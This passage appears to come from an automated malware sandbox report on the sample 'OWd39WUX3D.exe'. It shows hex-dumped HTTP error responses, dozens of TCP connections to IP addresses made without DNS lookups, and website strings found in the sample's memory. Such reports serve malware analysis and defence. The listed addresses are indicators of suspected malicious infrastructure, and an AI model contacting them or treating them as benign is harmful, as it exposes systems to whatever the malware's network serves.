72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 15 Sep 2023 05:28:26 GMTContent-Type: text/html; charset=UTF-8Server: ghsContent-Length: 1561X-XSS-Protection: 0X-Frame-Options: SAMEORIGINData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Fri, 15 Sep 2023 05:28:27 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 14014X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: FBP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 63 66 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Fri, 15 Sep 2023 05:28:28 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 14014X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: FBP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 63 66 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 15 Sep 2023 05:28:32 GMTContent-Type: text/htmlContent-Length: 125Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 15 Sep 2023 05:28:33 GMTServer: Apache/2.4.57 (Ubuntu)Content-Length: 273Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 6f 72 6b 70 6c 75 73 2e 68 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.57 (Ubuntu) Server at workplus.hu Port 80</address></body></html>
              Source: unknownTCP traffic detected without corresponding DNS query: 211.13.196.162
              Source: unknownTCP traffic detected without corresponding DNS query: 198.1.81.28
              Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
              Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
              Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
              Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
              Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
              Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
              Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
              Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
              Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
              Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
              Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
              Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
              Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
              Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
              Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
              Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
              Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
              Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
              Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
              Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
              Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
              Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
              Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
              Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
              Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
              Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
              Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
              Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
              Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
              Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
              Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
              Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
              Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
              Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
              Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
              Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
              Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
              Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
              Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
              Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
              Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
              Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
              Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
              Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
              Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
              Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
              Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
              Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <a href="https://www.facebook.com/PohlFoodService" target="_blank"> equals www.facebook.com (Facebook)
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <a href="https://www.linkedin.com/company/pohl-food-service" target="_blank"> equals www.linkedin.com (Linkedin)
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <a class="elementor-icon elementor-social-icon elementor-social-icon-youtube elementor-repeater-item-6def677" href="https://www.youtube.com/channel/UCvpY2zO1GRvxBdgkg7BUm-A" target="_blank"> equals www.youtube.com (Youtube)
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <a class="footicons" href="https://www.linkedin.com/company/elpro-lepenik/about/" target="_blank"><img id="LinkedIn" alt="LinkedIn" data-src="http://www.elpro.si/wp-content/themes/elpro/img/ICO-30-Linked-Grey.svg" class="lazyload" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" /><noscript><img id="LinkedIn" alt="LinkedIn" src="http://www.elpro.si/wp-content/themes/elpro/img/ICO-30-Linked-Grey.svg" /></noscript></a> equals www.linkedin.com (Linkedin)
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <a class="footicons" href="https://www.facebook.com/elprolepenik/" target="_blank"><img id="Facebook" alt="Facebook" data-src="http://www.elpro.si/wp-content/themes/elpro/img/ICO-30-FB-Grey.svg" class="lazyload" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" /><noscript><img id="Facebook" alt="Facebook" src="http://www.elpro.si/wp-content/themes/elpro/img/ICO-30-FB-Grey.svg" /></noscript></a> equals www.facebook.com (Facebook)
              Source: OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <meta property="article:publisher" content="https://www.facebook.com/PohlFoodService" /> equals www.facebook.com (Facebook)
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <meta property="article:publisher" content="https://www.facebook.com/elprolepenik/" /> equals www.facebook.com (Facebook)
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <a class="facebook" target="_blank" style="text-decoration:none; color: Black; " href="http://www.facebook.com/pages/Magnor-Glassverk/352345540472?ref=ts"> equals www.facebook.com (Facebook)
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Elpro Lepenik proizvodnja temperaturnih tipal in merilno regulacijska tehnika","publisher":{"@id":"https://www.elpro.si/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://www.elpro.si/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"sl-SI"},{"@type":"Organization","@id":"https://www.elpro.si/#organization","name":"ELPRO","url":"https://www.elpro.si/","logo":{"@type":"ImageObject","inLanguage":"sl-SI","@id":"https://www.elpro.si/#/schema/logo/image/","url":"https://www.elpro.si/wp-content/uploads/2020/02/LOGO-Header.svg","contentUrl":"https://www.elpro.si/wp-content/uploads/2020/02/LOGO-Header.svg","width":1,"height":1,"caption":"ELPRO"},"image":{"@id":"https://www.elpro.si/#/schema/logo/image/"},"sameAs":["https://www.facebook.com/elprolepenik/","https://www.linkedin.com/company/elpro-lepenik/about/"]}]}</script> equals www.facebook.com (Facebook)
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Elpro Lepenik proizvodnja temperaturnih tipal in merilno regulacijska tehnika","publisher":{"@id":"https://www.elpro.si/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://www.elpro.si/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"sl-SI"},{"@type":"Organization","@id":"https://www.elpro.si/#organization","name":"ELPRO","url":"https://www.elpro.si/","logo":{"@type":"ImageObject","inLanguage":"sl-SI","@id":"https://www.elpro.si/#/schema/logo/image/","url":"https://www.elpro.si/wp-content/uploads/2020/02/LOGO-Header.svg","contentUrl":"https://www.elpro.si/wp-content/uploads/2020/02/LOGO-Header.svg","width":1,"height":1,"caption":"ELPRO"},"image":{"@id":"https://www.elpro.si/#/schema/logo/image/"},"sameAs":["https://www.facebook.com/elprolepenik/","https://www.linkedin.com/company/elpro-lepenik/about/"]}]}</script> equals www.linkedin.com (Linkedin)
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Jetzt Kontakt aufnehmen","breadcrumb":{"@id":"https://www.com-sit.com/#breadcrumb"},"inLanguage":"de-DE","potentialAction":[{"@type":"ReadAction","target":["https://www.com-sit.com/"]}]},{"@type":"ImageObject","inLanguage":"de-DE","@id":"https://www.com-sit.com/#primaryimage","url":"https://www.com-sit.com/wp-content/uploads/2023/04/Header_1.jpg","contentUrl":"https://www.com-sit.com/wp-content/uploads/2023/04/Header_1.jpg","width":1920,"height":1080},{"@type":"BreadcrumbList","@id":"https://www.com-sit.com/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home"}]},{"@type":"WebSite","@id":"https://www.com-sit.com/#website","url":"https://www.com-sit.com/","name":"Comsit Website","description":"","publisher":{"@id":"https://www.com-sit.com/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://www.com-sit.com/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"de-DE"},{"@type":"Organization","@id":"https://www.com-sit.com/#organization","name":"ComSIT Distribution GmbH","url":"https://www.com-sit.com/","logo":{"@type":"ImageObject","inLanguage":"de-DE","@id":"https://www.com-sit.com/#/schema/logo/image/","url":"https://www.com-sit.com/wp-content/uploads/2023/03/Comsit.png","contentUrl":"https://www.com-sit.com/wp-content/uploads/2023/03/Comsit.png","width":1920,"height":417,"caption":"ComSIT Distribution GmbH"},"image":{"@id":"https://www.com-sit.com/#/schema/logo/image/"},"sameAs":["https://www.facebook.com/ComSITGmbH","https://www.linkedin.com/company/41265647/"]}]}</script> equals www.facebook.com (Facebook)
